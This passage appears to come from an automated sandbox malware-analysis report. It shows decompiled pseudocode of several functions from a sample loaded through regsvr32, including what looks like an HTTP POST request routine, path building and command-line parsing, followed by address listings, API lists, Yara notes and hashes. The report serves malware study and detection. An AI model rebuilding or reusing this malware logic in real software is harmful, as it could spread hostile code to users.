								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E0536A065(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E0536F6EC(_t116);
									}
									_t117 = E05369DD8(0x901);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x537f838; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0536A43D(_t193), _a4, _a8);
									E05368B9C( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E0536A065(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E05368D6D( &_v20, 0, _t122);
										_t127 =  *0x537f838; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E05369F6F( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x537f838; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x537f838; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x537f838; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x537f838; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x537f838; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x537f838; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x537f838; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x537f838; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x537f838; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}





























































                                                                                                                                                                        0x0536f7b4
                                                                                                                                                                        0x0536f7c0
                                                                                                                                                                        0x0536f7c7
                                                                                                                                                                        0x0536f7d4
                                                                                                                                                                        0x0536f7d7
                                                                                                                                                                        0x0536f7e8
                                                                                                                                                                        0x0536f7ff
                                                                                                                                                                        0x0536f80c
                                                                                                                                                                        0x0536f819
                                                                                                                                                                        0x0536f826
                                                                                                                                                                        0x0536f829
                                                                                                                                                                        0x0536f82e
                                                                                                                                                                        0x0536f833
                                                                                                                                                                        0x0536f835
                                                                                                                                                                        0x0536f83d
                                                                                                                                                                        0x0536f845
                                                                                                                                                                        0x0536f84c
                                                                                                                                                                        0x0536f858
                                                                                                                                                                        0x0536f85b
                                                                                                                                                                        0x0536f869
                                                                                                                                                                        0x0536f86c
                                                                                                                                                                        0x0536f872
                                                                                                                                                                        0x0536f873
                                                                                                                                                                        0x0536f875
                                                                                                                                                                        0x0536f87e
                                                                                                                                                                        0x0536f87f
                                                                                                                                                                        0x0536f884
                                                                                                                                                                        0x0536f88a
                                                                                                                                                                        0x0536f894
                                                                                                                                                                        0x0536f894
                                                                                                                                                                        0x0536f896
                                                                                                                                                                        0x0536f89b
                                                                                                                                                                        0x0536f8a5
                                                                                                                                                                        0x0536f8b0
                                                                                                                                                                        0x0536f8b9
                                                                                                                                                                        0x0536f8bb
                                                                                                                                                                        0x0536f8bd
                                                                                                                                                                        0x0536f8cc
                                                                                                                                                                        0x0536f8e3
                                                                                                                                                                        0x0536f8e9
                                                                                                                                                                        0x0536f8ec
                                                                                                                                                                        0x0536f8f0
                                                                                                                                                                        0x0536f8f2
                                                                                                                                                                        0x0536f8f7
                                                                                                                                                                        0x0536f8f7
                                                                                                                                                                        0x0536f8fc
                                                                                                                                                                        0x0536f8fe
                                                                                                                                                                        0x0536f914
                                                                                                                                                                        0x0536f918
                                                                                                                                                                        0x0536f91d
                                                                                                                                                                        0x0536f91f
                                                                                                                                                                        0x0536f91f
                                                                                                                                                                        0x0536f933
                                                                                                                                                                        0x0536f93e
                                                                                                                                                                        0x0536f941
                                                                                                                                                                        0x0536f944
                                                                                                                                                                        0x0536f947
                                                                                                                                                                        0x0536f94c
                                                                                                                                                                        0x0536f951
                                                                                                                                                                        0x0536f951
                                                                                                                                                                        0x0536f954
                                                                                                                                                                        0x0536f956
                                                                                                                                                                        0x0536f97c
                                                                                                                                                                        0x0536f980
                                                                                                                                                                        0x0536f984
                                                                                                                                                                        0x0536f984
                                                                                                                                                                        0x0536f98e
                                                                                                                                                                        0x0536f996
                                                                                                                                                                        0x0536f99b
                                                                                                                                                                        0x0536f9a6
                                                                                                                                                                        0x0536f9ac
                                                                                                                                                                        0x0536f9b6
                                                                                                                                                                        0x0536f9b9
                                                                                                                                                                        0x0536f9be
                                                                                                                                                                        0x0536f9c2
                                                                                                                                                                        0x0536f9c7
                                                                                                                                                                        0x0536f9c7
                                                                                                                                                                        0x0536f9cc
                                                                                                                                                                        0x0536f9d0
                                                                                                                                                                        0x0536fa1b
                                                                                                                                                                        0x0536fa1d
                                                                                                                                                                        0x0536fa20
                                                                                                                                                                        0x0536fa28
                                                                                                                                                                        0x0536fa2c
                                                                                                                                                                        0x0536fa2f
                                                                                                                                                                        0x0536fa41
                                                                                                                                                                        0x0536fa4c
                                                                                                                                                                        0x0536fa4e
                                                                                                                                                                        0x0536fa62
                                                                                                                                                                        0x0536fa67
                                                                                                                                                                        0x0536fa6c
                                                                                                                                                                        0x0536faa1
                                                                                                                                                                        0x0536faa6
                                                                                                                                                                        0x0536faab
                                                                                                                                                                        0x0536faad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536faad
                                                                                                                                                                        0x0536fa70
                                                                                                                                                                        0x0536fa73
                                                                                                                                                                        0x0536fa73
                                                                                                                                                                        0x0536fa79
                                                                                                                                                                        0x0536fa7c
                                                                                                                                                                        0x0536fa7f
                                                                                                                                                                        0x0536fa7f
                                                                                                                                                                        0x0536fa81
                                                                                                                                                                        0x0536fa83
                                                                                                                                                                        0x0536fa89
                                                                                                                                                                        0x0536fa89
                                                                                                                                                                        0x0536fa8c
                                                                                                                                                                        0x0536fa8e
                                                                                                                                                                        0x0536fa90
                                                                                                                                                                        0x0536fa97
                                                                                                                                                                        0x0536fa97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536fa9a
                                                                                                                                                                        0x0536fa50
                                                                                                                                                                        0x0536fa56
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536f9d2
                                                                                                                                                                        0x0536f9d2
                                                                                                                                                                        0x0536f9d8
                                                                                                                                                                        0x0536f9de
                                                                                                                                                                        0x0536f9e1
                                                                                                                                                                        0x0536f9e6
                                                                                                                                                                        0x0536f9eb
                                                                                                                                                                        0x0536f9ee
                                                                                                                                                                        0x0536f9f3
                                                                                                                                                                        0x0536f9f3
                                                                                                                                                                        0x0536f9f6
                                                                                                                                                                        0x0536f9f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536f9f9
                                                                                                                                                                        0x0536f958
                                                                                                                                                                        0x0536f958
                                                                                                                                                                        0x0536f95e
                                                                                                                                                                        0x0536f964
                                                                                                                                                                        0x0536f967
                                                                                                                                                                        0x0536f96c
                                                                                                                                                                        0x0536f96f
                                                                                                                                                                        0x0536f972
                                                                                                                                                                        0x0536f974
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536f974
                                                                                                                                                                        0x0536f900
                                                                                                                                                                        0x0536f900
                                                                                                                                                                        0x0536f906
                                                                                                                                                                        0x0536f90c
                                                                                                                                                                        0x0536f9fc
                                                                                                                                                                        0x0536f9fc
                                                                                                                                                                        0x0536f9fc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536f9fc
                                                                                                                                                                        0x0536f8fe
                                                                                                                                                                        0x0536f8bf
                                                                                                                                                                        0x0536f9fe
                                                                                                                                                                        0x0536fa01
                                                                                                                                                                        0x0536fa03
                                                                                                                                                                        0x0536fa06
                                                                                                                                                                        0x0536fa09
                                                                                                                                                                        0x0536fa09
                                                                                                                                                                        0x0536fa12
                                                                                                                                                                        0x0536fa14
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536fa18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536fa18
                                                                                                                                                                        0x0536f88e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0536F7D7
                                                                                                                                                                        • memset.MSVCRT ref: 0536F7E8
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0536F8BF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorLast
                                                                                                                                                                        • String ID: POST
                                                                                                                                                                        • API String ID: 2570506013-1814004025
                                                                                                                                                                        • Opcode ID: ce7a02bd5fbdeb21926df7fb71247a35e077373415e40d22708fa5ca67a785fd
                                                                                                                                                                        • Instruction ID: 91a8966a6bdff2f34731d0d9c82b3167959b0f97ddce5abaa2aef30c7930ae98
                                                                                                                                                                        • Opcode Fuzzy Hash: ce7a02bd5fbdeb21926df7fb71247a35e077373415e40d22708fa5ca67a785fd
                                                                                                                                                                        • Instruction Fuzzy Hash: 6DA11D75A10218AFDB21DFA4D848AAE7BF9FF48310F108169F905EB258DB749A85CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05371464 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snprintfqsort
                                                                                                                                                                        • String ID: %I64d$false$null$true
                                                                                                                                                                        • API String ID: 756996078-4285102228
                                                                                                                                                                        • Opcode ID: 1b4524e38b7127482f74dc5968423131f72abb0b6c6b348221f033814f74cbe7
                                                                                                                                                                        • Instruction ID: 30d79d63d5230d3079a65a3194a0d116ac3373af98263fa158a9867be4a0b157
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b4524e38b7127482f74dc5968423131f72abb0b6c6b348221f033814f74cbe7
                                                                                                                                                                        • Instruction Fuzzy Hash: 28E17CB3E0020EBBDF359E64CC85EBF7B6AEF04650F008019FD15A6141E679DA61DBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053650B3 Relevance: 9.3, APIs: 6, Instructions: 263stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E053650B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				signed int _v588;
				intOrPtr _v592;
				WCHAR* _v596;
				char _v600;
				intOrPtr _v604;
				char _v632;
				char _v636;
				void* __ebx;
				void* __esi;
				intOrPtr _t56;
				char _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t72;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t79;
				signed int _t81;
				intOrPtr _t82;
				WCHAR* _t84;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				intOrPtr _t97;
				signed char _t104;
				void* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t113;
				void* _t114;
				WCHAR* _t115;
				void* _t126;
				WCHAR* _t130;
				intOrPtr _t142;
				void* _t143;
				void* _t163;
				signed int _t166;
				void* _t167;
				void* _t169;
				void* _t173;
				signed int _t174;
				WCHAR* _t176;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t180;
				signed int _t182;
				void* _t185;
				void* _t186;
				WCHAR** _t187;
				void* _t192;

				_t192 = __fp0;
				_push(_t177);
				_t113 = __edx;
				_t173 = __ecx;
				_t178 = _t177 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_v588 = _v588 & 0x00000000;
				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
				_v596 = 1;
				if(_t173 != 0) {
					_t108 =  *0x537f81c; // 0x546fbe8
					_t5 = _t108 + 0x110; // 0x54716b8
					_t110 =  *0x537f820; // 0x546faa0
					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
				}
				if(E0536C9F4(_t173) != 0) {
					L4:
					_t56 = E0536C6CE();
					_push(_t113);
					_v592 = _t56;
					E0536C4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E05365072( &_v580,  &_v580, _t190);
					_t126 = E0536E2C5( &_v580, E0536A43D( &_v580), 0);
					E0536C6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E0536317E(_t173,  &_v580, _t190, _t192);
					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x537c9a0);
						_t115 = E05369A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x537f81c; // 0x546fbe8
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E053698BD(_v600);
								_t130 = _t115;
								 *0x537f8d8 = _t66;
								 *0x537f8d0 = E053698BD(_t130);
								L17:
								_push(_t130);
								_t174 = E0536A633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x537c9f2);
								_t163 = 0xe;
								E0536AAA3(_t163, _t192);
								E0536AADC(_t174, _t192, _t115);
								_t180 = _a4;
								_push( *_t180);
								E0536AA7E(0xb);
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E0536B025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E0536B025(_t166, _t192);
								}
								_t76 = E0536A065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E0536AA50();
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x537f81c; // 0x546fbe8
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E05370D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x537f81c; // 0x546fbe8
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E0536F0DE(_t169);
										}
										E0536584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x537f81c; // 0x546fbe8
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E0536109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E05368BAF( &_v596);
												 *_t187 = 0x537c9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x537c9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x546fe10
									_t142 = _t40;
									L25:
									_t78 = E05365AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x537f81c; // 0x546fbe8
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E0536D11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x537f818; // 0x546f8b0
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x537f818; // 0x546f8b0
								 *((intOrPtr*)(_t97 + 0x30))();
								E05368BF4( &_v636, _t178);
								_t130 = _t96;
								goto L17;
							}
							E05368BF4( &_v632, _t178);
							_t72 = 1;
							goto L42;
						}
						_t18 = _t65 + 0x1898; // 0x0
						_t104 =  *_t18;
						__eflags = _t104 & 0x00000004;
						if((_t104 & 0x00000004) == 0) {
							__eflags = _t104;
							if(_t104 != 0) {
								goto L12;
							}
							L11:
							E0536F1F6(_v600, _t161);
							goto L12;
						}
						E0536F1B6(_v600,  &_v580);
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t107 = E05363097( &_v532, _t178, 0x105);
					_t190 = _t107;
					if(_t107 == 0) {
						L41:
						E05365F6F( &_v588);
						_t72 = _t178;
						L42:
						return _t72;
					}
					goto L4;
				}
			}


























































                                                                                                                                                                        0x053650b3
                                                                                                                                                                        0x053650c0
                                                                                                                                                                        0x053650cb
                                                                                                                                                                        0x053650d0
                                                                                                                                                                        0x053650d2
                                                                                                                                                                        0x053650d5
                                                                                                                                                                        0x053650da
                                                                                                                                                                        0x053650df
                                                                                                                                                                        0x053650e2
                                                                                                                                                                        0x053650ec
                                                                                                                                                                        0x053650ee
                                                                                                                                                                        0x053650f3
                                                                                                                                                                        0x053650fb
                                                                                                                                                                        0x05365104
                                                                                                                                                                        0x05365104
                                                                                                                                                                        0x05365111
                                                                                                                                                                        0x0536512c
                                                                                                                                                                        0x0536512e
                                                                                                                                                                        0x05365133
                                                                                                                                                                        0x05365138
                                                                                                                                                                        0x0536513e
                                                                                                                                                                        0x0536514d
                                                                                                                                                                        0x0536516c
                                                                                                                                                                        0x0536516e
                                                                                                                                                                        0x05365173
                                                                                                                                                                        0x05365174
                                                                                                                                                                        0x0536517a
                                                                                                                                                                        0x0536517f
                                                                                                                                                                        0x05365186
                                                                                                                                                                        0x05365190
                                                                                                                                                                        0x05365192
                                                                                                                                                                        0x05365193
                                                                                                                                                                        0x0536519e
                                                                                                                                                                        0x053651a0
                                                                                                                                                                        0x053651a3
                                                                                                                                                                        0x053651a8
                                                                                                                                                                        0x053651af
                                                                                                                                                                        0x053651d3
                                                                                                                                                                        0x053651d3
                                                                                                                                                                        0x053651d8
                                                                                                                                                                        0x0536523f
                                                                                                                                                                        0x05365244
                                                                                                                                                                        0x05365246
                                                                                                                                                                        0x05365250
                                                                                                                                                                        0x05365255
                                                                                                                                                                        0x05365255
                                                                                                                                                                        0x0536526f
                                                                                                                                                                        0x05365271
                                                                                                                                                                        0x05365274
                                                                                                                                                                        0x05365276
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536527c
                                                                                                                                                                        0x05365283
                                                                                                                                                                        0x05365286
                                                                                                                                                                        0x0536528f
                                                                                                                                                                        0x05365294
                                                                                                                                                                        0x0536529a
                                                                                                                                                                        0x0536529f
                                                                                                                                                                        0x053652a4
                                                                                                                                                                        0x053652a8
                                                                                                                                                                        0x053652aa
                                                                                                                                                                        0x053652ae
                                                                                                                                                                        0x053652ae
                                                                                                                                                                        0x053652b3
                                                                                                                                                                        0x053652b6
                                                                                                                                                                        0x053652b8
                                                                                                                                                                        0x053652bc
                                                                                                                                                                        0x053652bc
                                                                                                                                                                        0x053652c3
                                                                                                                                                                        0x053652c8
                                                                                                                                                                        0x053652cc
                                                                                                                                                                        0x053652cf
                                                                                                                                                                        0x053652d4
                                                                                                                                                                        0x053652da
                                                                                                                                                                        0x053652db
                                                                                                                                                                        0x05365303
                                                                                                                                                                        0x05365309
                                                                                                                                                                        0x05365310
                                                                                                                                                                        0x0536531f
                                                                                                                                                                        0x05365324
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05365324
                                                                                                                                                                        0x05365312
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053652dd
                                                                                                                                                                        0x053652dd
                                                                                                                                                                        0x053652e2
                                                                                                                                                                        0x053652e9
                                                                                                                                                                        0x0536532e
                                                                                                                                                                        0x0536532e
                                                                                                                                                                        0x05365335
                                                                                                                                                                        0x05365339
                                                                                                                                                                        0x0536533a
                                                                                                                                                                        0x0536533a
                                                                                                                                                                        0x05365344
                                                                                                                                                                        0x05365349
                                                                                                                                                                        0x0536534c
                                                                                                                                                                        0x0536534d
                                                                                                                                                                        0x0536534f
                                                                                                                                                                        0x05365351
                                                                                                                                                                        0x05365356
                                                                                                                                                                        0x0536535d
                                                                                                                                                                        0x053653a0
                                                                                                                                                                        0x0536535f
                                                                                                                                                                        0x05365364
                                                                                                                                                                        0x0536536c
                                                                                                                                                                        0x05365370
                                                                                                                                                                        0x0536537b
                                                                                                                                                                        0x05365386
                                                                                                                                                                        0x0536538e
                                                                                                                                                                        0x05365392
                                                                                                                                                                        0x0536539a
                                                                                                                                                                        0x0536539a
                                                                                                                                                                        0x0536535d
                                                                                                                                                                        0x053653a6
                                                                                                                                                                        0x053653a9
                                                                                                                                                                        0x053653ab
                                                                                                                                                                        0x053653b1
                                                                                                                                                                        0x053653b1
                                                                                                                                                                        0x053653b3
                                                                                                                                                                        0x053653b3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053653b3
                                                                                                                                                                        0x053652eb
                                                                                                                                                                        0x053652eb
                                                                                                                                                                        0x053652f1
                                                                                                                                                                        0x053652f3
                                                                                                                                                                        0x053652f8
                                                                                                                                                                        0x053652f8
                                                                                                                                                                        0x053652fa
                                                                                                                                                                        0x05365329
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05365329
                                                                                                                                                                        0x053652fc
                                                                                                                                                                        0x0536518a
                                                                                                                                                                        0x0536518a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536518a
                                                                                                                                                                        0x053652db
                                                                                                                                                                        0x053651de
                                                                                                                                                                        0x053651ec
                                                                                                                                                                        0x053651ff
                                                                                                                                                                        0x05365204
                                                                                                                                                                        0x0536520a
                                                                                                                                                                        0x0536520c
                                                                                                                                                                        0x05365224
                                                                                                                                                                        0x05365229
                                                                                                                                                                        0x05365232
                                                                                                                                                                        0x05365238
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05365238
                                                                                                                                                                        0x05365214
                                                                                                                                                                        0x0536521d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536521d
                                                                                                                                                                        0x053651b1
                                                                                                                                                                        0x053651b1
                                                                                                                                                                        0x053651b7
                                                                                                                                                                        0x053651b9
                                                                                                                                                                        0x053651c6
                                                                                                                                                                        0x053651c8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053651ca
                                                                                                                                                                        0x053651ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053651ce
                                                                                                                                                                        0x053651bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053651bf
                                                                                                                                                                        0x05365188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05365113
                                                                                                                                                                        0x0536511e
                                                                                                                                                                        0x05365124
                                                                                                                                                                        0x05365126
                                                                                                                                                                        0x053653b5
                                                                                                                                                                        0x053653b9
                                                                                                                                                                        0x053653be
                                                                                                                                                                        0x053653c0
                                                                                                                                                                        0x053653c6
                                                                                                                                                                        0x053653c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05365126

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1985475764-0
                                                                                                                                                                        • Opcode ID: 555dad9dd58d0fbaf19f5943961e316b02e61fba63909580a35a7c8ebb6042f5
                                                                                                                                                                        • Instruction ID: af7f6aa858d6f26a14843892ba21a5411e06b140137fa08d041d0eefc42e035a
                                                                                                                                                                        • Opcode Fuzzy Hash: 555dad9dd58d0fbaf19f5943961e316b02e61fba63909580a35a7c8ebb6042f5
                                                                                                                                                                        • Instruction Fuzzy Hash: C4810271B04304ABC725EB60E849F7E77EABB85710F54863DF4569B288EFB098058B81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536DE26 Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E0536DE26(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x537c9a0);
						_t36 = E05369A5A( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E05368BF4( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















                                                                                                                                                                        0x0536de2f
                                                                                                                                                                        0x0536de36
                                                                                                                                                                        0x0536de39
                                                                                                                                                                        0x0536de46
                                                                                                                                                                        0x0536de4c
                                                                                                                                                                        0x0536de4f
                                                                                                                                                                        0x0536de51
                                                                                                                                                                        0x0536de56
                                                                                                                                                                        0x0536df2e
                                                                                                                                                                        0x0536df2e
                                                                                                                                                                        0x0536df2e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536de5c
                                                                                                                                                                        0x0536de5c
                                                                                                                                                                        0x0536de5c
                                                                                                                                                                        0x0536de5f
                                                                                                                                                                        0x0536de65
                                                                                                                                                                        0x0536de81
                                                                                                                                                                        0x0536de88
                                                                                                                                                                        0x0536de8e
